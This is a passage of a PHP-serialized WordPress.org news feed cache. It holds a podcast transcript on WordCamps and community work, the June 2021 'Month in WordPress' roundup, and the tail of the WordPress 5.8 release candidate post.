contributors who tested the&nbsp;Beta/RC releases and gave feedback.  Testing for bugs is a critical part of polishing every release and a great way to contribute to WordPress.</p>\n\n\n\n<h2>Plugin and Theme Developers</h2>\n\n\n\n<p>Please test your plugins and themes against WordPress 5.8 and update the&nbsp;<em>Tested up to</em>&nbsp;version in the <code>readme</code> file to 5.8.  If you find compatibility problems, please be sure to post to the&nbsp;<a href=\"https://wordpress.org/support/forum/alphabeta/\">support forums</a>,&nbsp;so they can get ready for the final release.</p>\n\n\n\n<p>For a more detailed breakdown of the changes included in WordPress 5.8, check out the <a href=\"https://wordpress.org/news/2021/06/wordpress-5-8-beta-1/\">WordPress 5.8 beta 1 post</a>.  The&nbsp;<a rel=\"noreferrer noopener\" target=\"_blank\" href=\"https://make.wordpress.org/core/2021/07/03/wordpress-5-8-field-guide/\">WordPress 5.8 Field Guide</a>, which is particularly useful for developers, has all the info and further links to help you get comfortable with the major changes.</p>\n\n\n\n<h2>How to Help</h2>\n\n\n\n<p>Can you speak and write in a language other than English? &nbsp;<a href=\"https://translate.wordpress.org/projects/wp/dev\">Help us translate WordPress into more than 100 languages!</a></p>\n\n\n\n<p><em><strong>If you think you have found a bug</strong>, you can post to the&nbsp;<a href=\"https://wordpress.org/support/forum/alphabeta\">Alpha/Beta area</a>&nbsp;in the support forums.  We would love to hear from you!  If you are comfortable writing a reproducible bug report,&nbsp;<a href=\"https://core.trac.wordpress.org/newticket\">file one on WordPress Trac</a>, where you can also find&nbsp;<a href=\"https://core.trac.wordpress.org/tickets/major\">a list of known bugs</a>.</em></p>\n\n\n\n<p class=\"has-text-align-right\"><strong><em>Props to <a href=\'https://profiles.wordpress.org/lukecarbis/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>lukecarbis</a> for the haiku, <a href=\'https://profiles.wordpress.org/webcommsat/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>webcommsat</a> and <a href=\'https://profiles.wordpress.org/marybaum/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>marybaum</a> for peer reviewing!</em></strong></p>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<p><em>Five-eight in two weeks<br>So test your plugins and themes<br>Update your readme</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"10912\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:58:\"\n		\n		\n		\n		\n		\n				\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"WP Briefing: Episode 12: WordPress – In Person!\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"https://wordpress.org/news/2021/07/episode-12-wordpress-in-person/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Jul 2021 12:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"wp-briefing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=10889\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:384:\"In this episode, Josepha Haden Chomphosy talks about WordPress &#8211; In Person! The WordPress events that provide the dark matter of connection that helps sustain the open source project. Have a question you&#8217;d like answered? You can submit them to wpbriefing@wordpress.org, either written or as a voice recording. Credits Editor: Dustin Hartzler Logo: Beatriz Fialho [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:60:\"https://wordpress.org/news/files/2021/07/WP-Briefing-012.mp3\";s:6:\"length\";s:1:\"0\";s:4:\"type\";s:0:\"\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Chloe Bringmann\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:13118:\"\n<p>In this episode, Josepha Haden Chomphosy talks about WordPress &#8211; In Person! The WordPress events that provide the dark matter of connection that helps sustain the open source project.</p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2>Credits</h2>\n\n\n\n<p>Editor:<a href=\"https://profiles.wordpress.org/dustinhartzler/\"> Dustin Hartzler</a></p>\n\n\n\n<p>Logo:<a href=\"https://profiles.wordpress.org/beafialho/\"> Beatriz Fialho</a></p>\n\n\n\n<p>Production:<a href=\"https://profiles.wordpress.org/mkaz/\"> </a><a href=\"https://profiles.wordpress.org/cbringmann/\">Chloé Bringmann</a></p>\n\n\n\n<p>Song: Fearless First by Kevin MacLeod</p>\n\n\n\n<h2>References</h2>\n\n\n\n<p><a href=\"https://en.wikipedia.org/wiki/Tragedy_of_the_commons\">The tragedy of the commons</a></p>\n\n\n\n<p><a href=\"https://wordpress.org/news/2021/06/wordpress-5-8-release-candidate/\">WordPress 5.8 Release Candidate announcement </a></p>\n\n\n\n<h2>Transcript </h2>\n\n\n\n<span id=\"more-10889\"></span>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>00:11</p>\n\n\n\n<p>Hello, everyone, and welcome to the WordPress Briefing, the podcast where you can catch quick explanations of the ideas behind the WordPress open source project, some insight into the community that supports it, and get a small list of big things coming up in the next two weeks. I&#8217;m your host, Josepha Haden Chomphosy. Here we go!</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>00:39</p>\n\n\n\n<p>Today we&#8217;re talking about one of my favorite parts of the project &#8211; WordPress events. The in-person component of the project is the dark matter that helps us build resilience and thrive as a group. A lot of what I&#8217;m going to share applies to every WordPress event, whether it&#8217;s a meetup or workshop, a contributor day, any other sort of format. But I&#8217;ll be focused on WordCamps. It&#8217;s been a while since we had any in-person WordCamps. Our last two were WordCamp Malaga in Spain and WordCamp Greenville in the US. But that hasn&#8217;t stopped anyone from gathering people together online. Which honestly makes a lot of sense for WordPress. Because there are many reasons we gather, the main three reasons are connecting, inspiring, and contributing. It&#8217;s true. It says so right in our documentation, &#8220;paper rustling.&#8221; All WordPress events should connect WordPress users, inspire people to do more with WordPress, and contribute to the WordPress project. As an aside, I&#8217;ll tell you that some groups also get to collaborate and educate in there, but connect, inspire, contribute. Those are the big three. And that&#8217;s what I&#8217;m talking about today. And if you subscribe to this podcast for the back office deep cuts, I&#8217;ll also have a few of those for you. </p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>01:57</p>\n\n\n\n<p>Alright, so first up, connect. WordCamps are generally annual-ish gatherings organized by local WordPress meetup groups. They&#8217;re not meant to be big or fancy. The definition of the minimum viable product for WordCamp is 50 people gathered all day to talk about WordPress. They are intentionally affordable to allow people from all walks of life to attend, meet, share and learn. This is made possible by donations and sponsorships from local businesses and larger businesses in the WordPress ecosystem. And this helps us get people connected to those in their community that works with or are sustained by WordPress. That connection feeds into the overall health of the global WordPress project. </p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>02:45</p>\n\n\n\n<p>Next up is inspire. WordCamps do not discriminate. They are open to any WordPress users, developers, designers, or other enthusiasts, regardless of their level of experience. And because of this, sessions generally span a variety of formats. So presentations or live demos to workshops or panels, any other format you can think of. But that also means that there are a variety of skill levels represented. There&#8217;s always content about how to use WordPress. That’s a given. But you can also count on content that inspires people to do more with their own dreams and aspirations. When I was still organizing WordCamps, my favorite thing was seeing people who came back year after year, putting into practice something that they learned the year before. It is that <em>Choose Your Own Adventure</em> aspect to WordCamps that lets people see the edge of their ideas and then expand that just a little bit further. </p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>03:42</p>\n\n\n\n<p>And finally, contribute. WordCamps often have a contribution component to them. Sometimes it&#8217;s just a talk telling you how you can get more involved in the WordPress project. But sometimes, it&#8217;s a whole contributor day. And those range in size from single focus, like everyone, will show up and learn how to review a theme or a focus from every team that we have, like at the big flagship events where we gather hundreds of people into a room just to contribute to WordPress and all of the teams that go with it. Getting started with contributing can be daunting, but it is also essential to avoid something called the Tragedy of the Commons, an economic concept. So I&#8217;ll share a link to that in the show notes below. But the most important thing, the most important thing to remember, is that WordPress is open source. And we asked people to help us keep this great tool running by giving back a little bit of their time if they have gotten any benefit from the WordPress project or CMS over the course of their careers.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>04:40</p>\n\n\n\n<p>So that&#8217;s it. The three big things you can get from a WordCamp. I know that I can&#8217;t wait to get back to them myself because while a lot of these things can still happen online and do, it&#8217;s really hard to replace the dark matter of in-person connections for open source projects. And since we&#8217;re talking dark matter anyway, let&#8217;s dig into it a little.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>05:01</p>\n\n\n\n<p>At the start of the section, I mentioned that WordCamps are local, locally organized, and people are encouraged to attend locally. But I am part of a group that ends up traveling to a lot of WordCamps. If you don&#8217;t know about the unseen work of WordPress, this raises eyebrows. So here is some clarification around the back office work that some of these traveling WordCampers often do. When I listed these out, there were about 20 different tasks, 20 different jobs, which was, frankly, a bit overwhelming when I listed them that way. So I&#8217;ve grouped them into kind of two genres, each with a group of current versus future types of work. So my two big buckets, big picture stuff, and then community stewardship.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>05:50</p>\n\n\n\n<p>The big picture stuff, our first big genre here, when you&#8217;re looking at current topics, current issues kind of information, when we&#8217;re working on big picture stuff, you get the clarification of the mission or vision of WordPress, the sharing of open source methods or processes that we use in the WordPress project, and also sometimes those goal-setting conversations that you have to have both because we have a bunch of teams and team reps, that have a lot of really great ideas about what can be done in their teams to help WordPress succeed. But then also, because when you are working, when you&#8217;re contributing to a single team in the project, it can sometimes be hard to know how your work relates to the overall goals and visions of WordPress. And so that&#8217;s part of the work that gets done that I do there.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>06:43</p>\n\n\n\n<p>And when you&#8217;re looking at future topics, future issues, the second part of this genre, that stuff like starting conversations or discussions around what the future holds for WordPress, and that&#8217;s the project as well as the technology or hearing from people about big things coming up for them. And any content that can support it, anything that I can provide to support those big things. It&#8217;s also a good time for me and others to identify trends based on what I see in presentations or what I hear from people at social functions. Really, it&#8217;s just a huge opportunity for information gathering to make sure that I know what everyone else in the project is trying to do and if they understand what the project is trying to do.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>07:32</p>\n\n\n\n<p>And then the second big genre of things that happen in that dark matter kind of work at WordCamps is what I call community stewardship—so taking care of the community itself for the project itself. And a lot of that work is actually incident response kind of work. So conflict resolution, mediation often happens at in-person events, but also uncovering the shared foundations, the shared understanding for upcoming changes. So a lot of really, in the weeds kind of change management work. And for me, it&#8217;s certainly doing my best as a cultural liaison when I do see that there has been some miscommunication or gathering context for the latest disagreement that people are having with me so that I can clarify anything that was misunderstood from what I said. And also a little bit of policy clarification, just explaining why we do things and the way we do them. So for community stewardship, that&#8217;s kind of the current stuff that we look at. And that I do when I&#8217;m traveling for WordCamps. </p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>08:36</p>\n\n\n\n<p>And then for the future tasks that we do with community stewardship in the project, that stuff like training, and that&#8217;s training team reps, community deputies, or new contributors like it&#8217;s, it&#8217;s not really one type of training, necessarily. But then also, all of the checking in with our organizers, team reps, volunteers, sponsors, everyone like that, to make sure that what we have in the project and what&#8217;s happening in the project, the tools that we have, the experience that contributors have while they are working here, and WordPress is good, and is what they need. We&#8217;ve got a lot of tools to get things done in WordPress, and we can always make them better. And so checking in with people to kind of see how those processes are, how the tools are making sure that I have an idea of where our holes are and what needs to be patched, and how we can patch them in the long run. So that&#8217;s all of the future planning kind of work and topic stuff, just you know, making sure that WordPress has what it needs to survive long into the future and long after I&#8217;m doing anything with it, and long after you&#8217;re doing anything with it either.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>09:56</p>\n\n\n\n<p>So, lots and lots of unseen work being done at our in-person events. But folks who keep a keen eye on the online global work of WordPress will probably recognize that a lot of that work is also done routinely on make.wordpress.org and within the making WordPress Slack. There’s just, I don&#8217;t know, there&#8217;s just something different about receiving information from a human being with a face rather than an avatar with a photo. So I guess at the end of the day, that means the dark matter that keeps open source together is really an issue of communication. And you&#8217;ll get no arguments for me there.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>10:44</p>\n\n\n\n<p>That brings us now to our small list of big things. And there&#8217;s really just one big thing. And that&#8217;s WordPress 5.8. We are about two weeks away from this big release; the community has been working tirelessly on it. And it&#8217;s shaping up to be one of the most tested releases that we&#8217;ve had in a long time. Myself, I&#8217;m grateful to see so much activity before the release. Since 5.8 and 5.9 releases represent such monumental shifts in our software, I&#8217;m incredibly grateful to see so much activity prior to the release, especially in the beta period. We&#8217;ve been testing everything for it feels like six or eight months, and we&#8217;re really starting to see the positive benefits of that. And I think that we, the WordPress community, should be really proud of everything that we&#8217;re going to ship in 2021. Okay, so that was less of a small list of big things and really like one big thing with a generous garnish of encouragement, but you deserve it. So thank you for tuning in today for the WordPress briefing. I&#8217;m your host, Josepha Haden Chomphosy, and I&#8217;ll see you again in a couple of weeks.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"10889\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:57:\"\n		\n		\n		\n		\n		\n				\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"The Month in WordPress: June 2021\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wordpress.org/news/2021/07/the-month-in-wordpress-june-2021/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 02 Jul 2021 15:11:24 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Month in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=10896\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:334:\"Once you step into contribution time, your main concern is the users of WordPress, or new contributors, or the health of the WordPress ecosystem as a whole or the WordPress project. So you get all this subject matter expertise from competitive forces, collaborating in a very “us versus the problem” way. And when you do [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Hari Shanker R\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:11608:\"\n<blockquote class=\"wp-block-quote\"><p>Once you step into contribution time, your main concern is the users of WordPress, or new contributors, or the health of the WordPress ecosystem as a whole or the WordPress project. So you get all this subject matter expertise from competitive forces, collaborating in a very “us versus the problem” way. And when you do that, you’re always going to find a great solution.</p></blockquote>\n\n\n\n<p>In the “<a href=\"https://wordpress.org/news/2021/06/episode-11-wordcamp-europe-2021-in-review/#more-10837\">WordCamp Europe 2021 in Review</a>” episode of the WP Briefing podcast, <a href=\"https://profiles.wordpress.org/chanthaboune/\">Josepha Haden</a> talks about the importance of collaboration, which is vital in building WordPress. This edition of The Month in WordPress covers exciting updates that exemplify this philosophy.&nbsp;</p>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<h2>Updates on WordPress 5.8</h2>\n\n\n\n<p>Get excited, folks! The beta versions and the first release candidate of WordPress 5.8 are out. <a href=\"https://wordpress.org/news/2021/06/wordpress-5-8-beta-1/\">Beta 1</a> came out on June 9, followed by <a href=\"https://wordpress.org/news/2021/06/wordpress-5-8-beta-2/\">Beta 2</a> on June 15, <a href=\"https://wordpress.org/news/2021/06/wordpress-5-8-beta-3/\">Beta 3</a> on June 23, and <a href=\"https://wordpress.org/news/2021/06/wordpress-5-8-beta-4/\">Beta 4</a> on June 25. The <a href=\"https://wordpress.org/news/2021/06/wordpress-5-8-release-candidate/\">first release candidate</a> of WordPress 5.8 was published on June 30. You can test the beta versions and the release candidates by <a href=\"https://wordpress.org/download/releases/#betas\">downloading them from WordPress.org</a> or by using the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin. WordPress 5.8 <a href=\"https://make.wordpress.org/core/5-8/\">will be out by July 20, 2021</a>, and is also <a href=\"https://make.wordpress.org/polyglots/2021/06/28/wordpress-5-8-ready-to-be-translated/\">ready to be translated</a>.</p>\n\n\n\n<p>Want to contribute to WordPress core? Check out the <a href=\"https://make.wordpress.org/core/handbook/\">Core Contributor Handbook</a>. Don’t forget to join the WordPress <a href=\"https://wordpress.slack.com/archives/C02RQBWTW\">#core</a> channel in the <a href=\"https://make.wordpress.org/chat/\">Make WordPress Slack</a> and follow the <a href=\"https://make.wordpress.org/core/\">Core Team blog</a>. The Core Team hosts weekly chats on Wednesdays at <a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?hour=5&amp;min=00&amp;sec=0\">5 AM</a> and <a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?hour=20&amp;min=00&amp;sec=0\">8 PM</a> UTC. Help us promote WordPress 5.8 by <a href=\"https://make.wordpress.org/community/2021/06/18/meetup-group-resources-talking-points-for-wordpress-5-8/\">organizing meetups about the release</a>, <a href=\"https://make.wordpress.org/marketing/2021/06/30/help-produce-social-media-materials-for-5-8-release/\">producing social media marketing materials for 5.8</a>, or <a href=\"https://make.wordpress.org/test/2021/06/30/help-test-wordpress-5-8s-fse-features/\">testing the release</a>.</p>\n\n\n\n<h2>Gutenberg versions 10.8 and 10.9 are out</h2>\n\n\n\n<p>We said hello to Gutenberg <a href=\"https://make.wordpress.org/core/2021/06/10/whats-new-in-gutenberg-10-8-9-june/\">version 10.8</a> and <a href=\"https://make.wordpress.org/core/2021/06/24/whats-new-in-gutenberg-10-9-23-june/\">version 10.9</a> this month. <a href=\"https://make.wordpress.org/core/2021/06/10/whats-new-in-gutenberg-10-8-9-june/\">Version 10.8</a> adds rich URL previews, enhancements to the list view, and an updated block manager. <a href=\"https://make.wordpress.org/core/2021/06/24/whats-new-in-gutenberg-10-9-23-june/\">Version 10.9</a> offers several performance enhancements, along with more block design tools and template editor enhancements.</p>\n\n\n\n<p>Want to get involved in building Gutenberg? Follow <a href=\"https://make.wordpress.org/core/\">the Core Team blog</a>, contribute to <a href=\"https://github.com/WordPress/gutenberg/\">Gutenberg on GitHub</a>, and join the <a href=\"https://wordpress.slack.com/archives/C02QB2JS7\">#core-editor</a> channel in the <a href=\"https://make.wordpress.org/chat/\">Make WordPress Slack</a>. The “<a href=\"https://make.wordpress.org/core/2021/06/04/whats-next-in-gutenberg-june-2021/\">What’s next in Gutenberg</a>” post offers more details on the latest updates.&nbsp;</p>\n\n\n\n<h2>WordCamp Europe 2021 concludes</h2>\n\n\n\n<p>One of the biggest and most exciting WordPress events, <a href=\"https://europe.wordcamp.org/2021/\">WordCamp Europe 2021</a>, was held from June 7-9, 2021. A team of 40 members organized the event, which had 3200+ registrations, 42 speakers, and 43 sponsors. What a success! You will find more details <a href=\"https://europe.wordcamp.org/2021/a-recap-on-wceu-2021/\">in the event recap</a>. One highlight was a <a href=\"https://wordpress.org/news/2021/06/gutenberg-highlights/\">Gutenberg demo</a> hosted by <a href=\"https://profiles.wordpress.org/matveb/\">Matías Ventura</a> and <a href=\"https://profiles.wordpress.org/matt/\">Matt Mullenweg</a>. You can <a href=\"https://www.youtube.com/channel/UCaYQGYDpXpU4A17kxN-AgJQ/featured\">watch the event recording on the WordCamp Europe YouTube channel</a>, and videos <a href=\"https://wordpress.tv/event/wordcamp-europe-2021/\">are now available on WordPress.tv</a> as well. The team has announced <a href=\"https://europe.wordcamp.org/2022/\">WordCamp Europe 2022</a>, which is being planned as an in-person event in Porto, Portugal. Want to be a part of the 2022 WCEU organizing team? Their <a href=\"https://europe.wordcamp.org/2022/call-for-organisers/\">call for organizers is now open</a>. Apply now!</p>\n\n\n\n<h2>Full Site Editing updates</h2>\n\n\n\n<p>Don’t miss the <a href=\"https://make.wordpress.org/test/2021/06/24/call-for-testing-thrive-with-theme-json/\">latest Full Site Editing (FSE) Outreach program testing call: &#8220;Thrive with theme.json&#8221;</a>, which is aimed at a developer-centric audience. The deadline is July 14. Also don’t miss a <a href=\"https://make.wordpress.org/test/2021/06/24/call-for-testing-thrive-with-theme-json/\" data-type=\"URL\" data-id=\"https://make.wordpress.org/test/2021/06/24/call-for-testing-thrive-with-theme-json/\">hallway hangout on testing theme.json on July 7 at 5 PM UTC</a>. The team has published a <a href=\"https://make.wordpress.org/test/2021/06/24/fse-program-polished-portfolios-summary/\">recap of the Published Portfolios testing call</a>, which shares some interesting results.&nbsp;</p>\n\n\n\n<h2>BuddyPress 8.0 is out!</h2>\n\n\n\n<p>The first major BuddyPress release of 2021, <a href=\"https://buddypress.org/2021/06/buddypress-8-0-0-alfano/\">version 8.0</a> “Alfano,” came out on June 6. The short-cycle release offers features such as the ability to recruit new members, an improved registration experience, and profile field types. Download it from the <a href=\"https://wordpress.org/plugins/buddypress/\">WordPress.org plugin directory</a> or check it out from its <a href=\"https://buddypress.trac.wordpress.org/browser/branches/8.0\">Subversion repository.</a></p>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<h2>Further reading</h2>\n\n\n\n<ul><li><a href=\"https://japan.wordcamp.org/2021/\">WordCamp Japan 2021</a> was held from June 20- 26. The weeklong event, which had two session days followed by five contributor days, sold 1300+ tickets, with 45 speakers and 23 sponsors. Catch the <a href=\"https://www.youtube.com/c/wordcampjapan\">event recording on YouTube</a>!</li><li>Josepha Haden <a href=\"https://make.wordpress.org/updates/2021/06/03/announcing-make-wordpress-org-project/\">announced</a> a new Make site — <a href=\"https://make.wordpress.org/project\">make.wordpress.org/project</a> — for project-wide announcements, which will no longer be posted to Make/Updates. Check out the latest post on that site on <a href=\"https://make.wordpress.org/project/2021/06/17/the-metrics-of-contributions/\">the metrics of contributions</a>.</li><li>The Community Team announced that <a href=\"https://make.wordpress.org/community/2021/07/01/in-person-meetup-events-for-vaccinated-community-members/\">in-person meetups can be organized for fully vaccinated people</a>, in places where vaccines are freely available.</li><li>The Core Team added<a href=\"https://make.wordpress.org/core/2021/06/21/bundled-themes-changes-in-wordpress-5-8/\"> block patterns and improvements</a> to all legacy default themes. The team also shared a <a href=\"https://make.wordpress.org/core/2021/06/22/extending-the-site-health-interface-in-wordpress-5-8/\">feature request</a> that will allow developers to modify and extend the Site Health feature in Core.</li><li>The Design Team shared an update on the <a href=\"https://make.wordpress.org/design/2021/06/23/update-initial-patterns-for-the-patterns-directory/\">block pattern directory</a>; the team is continuing to review suggestions and has offered some guidelines in this post.</li><li>The Design Team is also <a href=\"https://wordpress.org/news/2021/06/a-new-design-is-coming-to-wordpress-news/\">working on redesigning this blog</a> (wordpress.org/news). Catch a sneak peek of the blog&#8217;s new look <a href=\"https://make.wordpress.org/design/2021/06/03/redesign-of-wordpress-org-news/\">in this Make/Design blog post</a>.</li><li>The Accessibility Team shared the <a href=\"https://developer.wordpress.org/coding-standards/wordpress-coding-standards/accessibility/\">updated WordPress Accessibility coding standards</a>.</li><li>The Polyglots Team proposed a <a href=\"https://make.wordpress.org/polyglots/2021/06/03/proposal-month-long-translation-day-2021-celebration/\">monthlong translation day celebration in September</a>.</li><li><span style=\"color: initial;, sans-serif\">The Support Team </span><a style=\", sans-serif\" href=\"https://make.wordpress.org/support/2021/06/new-irc-server-for-support/\">moved their IRC chat server from Freenode to Libera</a><span style=\"color: initial;, sans-serif\">.</span></li><li>The Documentation Team is<a href=\"https://make.wordpress.org/docs/2021/06/06/writing-documentation-for-wordpress-release/\"> working hard on updating our docs</a> for WordPress 5.8.&nbsp;</li><li>The Themes Team has decided to <a href=\"https://make.wordpress.org/docs/2021/06/06/writing-documentation-for-wordpress-release/\">automatically set theme updates live for old themes</a> instead of routing them through the review queue.</li><li>The <a href=\"https://github.com/WordPress/Requests\">WordPress Requests library</a> has a new release: <a href=\"https://github.com/WordPress/Requests/releases/tag/v1.8.1\">version 1.8.1</a>.&nbsp;</li><li><a href=\"https://en.wikipedia.org/wiki/Ujwal_Thapa\">Ujwal Thapa</a> &#8211; co-founder of the Nepal WordPress community <a href=\"https://wptavern.com/ujwal-thapa-co-founder-of-the-wordpress-nepal-community-passes-away\">passed away due to COVID-19</a>. Our community deeply mourns his loss and is thankful for his contributions.</li><li>The latest edition of “<a href=\"https://wordpress.org/news/category/heropress/\">People of WordPress</a>” features <a href=\"https://wordpress.org/news/2021/06/people-of-wordpress-tijana-andrejic/\">Tijana Andrejic from Serbia.</a></li></ul>\n\n\n\n<p><em>Have a story that we should include in the next “Month in WordPress” post? Please </em><a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\"><em>submit it using this form</em></a><em>.&nbsp;</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"10896\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"WordPress 5.8 Release 